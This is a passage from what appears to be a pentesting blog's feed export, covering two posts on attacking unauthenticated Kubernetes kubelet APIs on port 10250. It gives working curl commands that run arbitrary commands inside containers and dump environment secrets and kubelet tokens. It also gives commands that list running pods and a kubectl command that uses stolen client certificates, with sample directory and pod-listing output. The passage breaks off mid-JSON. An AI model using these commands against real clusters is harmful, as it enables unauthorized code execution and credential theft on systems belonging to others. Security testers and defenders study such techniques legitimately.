\/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4.0K Sep 11 07:25 ..\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E-rwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Sep 11 07:25 .dockerenv\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 3 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4.0K Sep 11 07:25 apiserver.local.config\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;12.0K Sep 11 07:24 bin\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 5 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;380 Sep 11 07:25 dev\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4.0K Sep 11 07:25 etc\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 nobody\u0026nbsp; \u0026nbsp;nogroup\u0026nbsp; \u0026nbsp; \u0026nbsp;4.0K Nov\u0026nbsp; 1\u0026nbsp; 2017 home\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003E-rwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;39.2M Dec 20\u0026nbsp; 2017 metrics-server\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edr-xr-xr-x\u0026nbsp; 135 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Sep 11 07:25 proc\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4.0K Dec 19 21:33 root\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edr-xr-xr-x\u0026nbsp; \u0026nbsp;12 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Dec 19 19:06 sys\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxrwxrwt\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4.0K Oct 18 13:57 tmp\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 3 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4.0K Sep 11 07:24 usr\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: x-small;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4.0K Sep 11 07:25 var\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nFor completeness if you got the keys via the environment variables the kubectl command would be something like this:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ekubectl --server=https:\/\/1.2.3.4 --certificate-authority=ca.crt\u0026nbsp;\u003C\/span\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E--client-key=kublet.key --client-certificate=kublet.crt get pods --all-namespaces\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/6234181538420825341\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=6234181538420825341","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6234181538420825341"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6234181538420825341"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/01\/kubernetes-unauth-kublet-api-10250_16.html","title":"Kubernetes: unauth kublet API 10250 token theft \u0026 kubectl"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/3.bp.blogspot.com\/-OqALsU3GtcY\/XDZc2KK24aI\/AAAAAAAACZ8\/9n9Vz4riZMIXwdCcwMkMTGcv9s7uoEsYwCLcBGAs\/s72-c\/Screen%2BShot%2B2019-01-09%2Bat%2B3.42.09%2BPM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-8143265817877621541"},"published":{"$t":"2019-01-16T09:00:00.000-05:00"},"updated":{"$t":"2019-01-16T09:00:16.939-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"cloud"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"hacking"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Kubernetes"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Kubernetes: unauth kublet API 10250 basic code exec"},"content":{"type":"html","$t":"Unauth API access (10250)\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nMost Kubernetes deployments provide authentication for this port. But it’s still possible to expose it inadvertently and it's still pretty common to find it exposed via the \"insecure API service\" option.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cdiv\u003E\n\u003Cdiv\u003E\nEverybody who has access to the service kubelet port (10250), even without a certificate, can execute any command inside the container.\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E# \/run\/%namespace%\/%pod_name%\/%container_name%\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nexample:\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E$ curl -k -XPOST \"https:\/\/k8s-node-1:10250\/run\/kube-system\/node-exporter-iuwg7\/node-exporter\" -d \"cmd=ls -la \/\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Etotal 12\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp;13 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;148 Aug 26 11:31 .\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp;13 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;148 Aug 26 11:31 ..\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E-rwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Aug 26 11:31 .dockerenv\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 8192 May\u0026nbsp; 5 22:22 bin\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 5 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;380 Aug 26 11:31 dev\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 3 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;135 Aug 26 11:31 etc\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 nobody\u0026nbsp; \u0026nbsp;nogroup\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 6 Mar 18 16:38 home\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;6 Apr 23 11:17 lib\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edr-xr-xr-x\u0026nbsp; 353 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Aug 26 07:14 proc\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;6 Mar 18 16:38 root\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edr-xr-xr-x\u0026nbsp; \u0026nbsp;13 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Aug 26 15:12 sys\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxrwxrwt\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;6 Mar 18 16:38 tmp\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 4 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 31 Apr 23 11:17 usr\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 5 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 41 Aug 26 11:31 var\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nHere is how to get all secrets which container uses (environment variables - commons to see kublet tokens here):\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E$ curl -k -XPOST \"https:\/\/k8s-node-1:10250\/run\/kube-system\/\u003Cpodname\u003E\/\u003Ccontainer-name\u003E\" -d \"cmd=env\"\u003C\/container-name\u003E\u003C\/podname\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nThe list of all pods and containers which were scheduled on the Kubernetes worker node could be retrieved using command below:\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E$ curl -sk https:\/\/k8s-node-1:10250\/runningpods\/ | python -mjson.tool\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nor\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E$ curl --insecure\u0026nbsp; https:\/\/k8s-node-1:10250\/runningpods | jq\u003C\/span\u003E\u003C\/div\u003E\n\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cdiv\u003E\nExample 1:\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl --insecure\u0026nbsp; https:\/\/1.2.3.4:10250\/runningpods | jq\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nOutput:\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003EForbidden (user=system:anonymous, verb=create, resource=nodes, subresource=proxy)\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nExample 2:\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl --insecure\u0026nbsp; https:\/\/1.2.3.4:10250\/runningpods | jq\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nOutput:\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003EUnauthorized\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nExample 3:\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl --insecure\u0026nbsp; https:\/\/1.2.3.4:10250\/runningpods | jq\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\nOutput:\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E{\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \"kind\": \"PodList\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \"apiVersion\": \"v1\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \"metadata\": {},\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \"items\": [\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \"metadata\": {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"name\": \"kube-dns-5b8bf6c4f4-k5n2g\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"generateName\": \"kube-dns-5b8bf6c4f4-\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"namespace\": \"kube-system\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"selfLink\": \"\/api\/v1\/namespaces\/kube-system\/pods\/kube-dns-5b8bf6c4f4-k5n2g\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"uid\": \"63438841-e43c-11e8-a104-42010a80038e\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"resourceVersion\": \"85366060\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"creationTimestamp\": \"2018-11-09T16:27:44Z\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"labels\": {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"k8s-app\": \"kube-dns\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"pod-template-hash\": \"1646927090\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"annotations\": {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"kubernetes.io\/config.seen\": \"2018-11-09T16:27:44.990071791Z\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"kubernetes.io\/config.source\": \"api\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"scheduler.alpha.kubernetes.io\/critical-pod\": \"\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; },\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"ownerReferences\": [\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; {\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"apiVersion\": \"extensions\/v1beta1\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \"kind\": \"ReplicaSet\",\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 